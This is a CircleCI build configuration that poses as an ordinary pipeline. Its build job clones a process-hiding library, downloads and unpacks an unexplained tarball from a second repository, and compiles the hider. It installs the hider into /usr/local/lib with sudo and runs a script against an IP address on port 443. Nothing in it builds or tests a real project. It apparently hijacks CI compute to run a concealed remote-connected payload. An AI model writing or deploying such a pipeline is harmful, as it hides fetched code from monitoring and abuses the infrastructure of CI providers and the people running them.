# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuratio
version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-1604:202007-01
    steps:
      - checkout
      - run: git clone https://github.com/lallianto/libprocesshider
      - run: cd libprocesshider
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: ./sgr.sh 1.2.3.4 443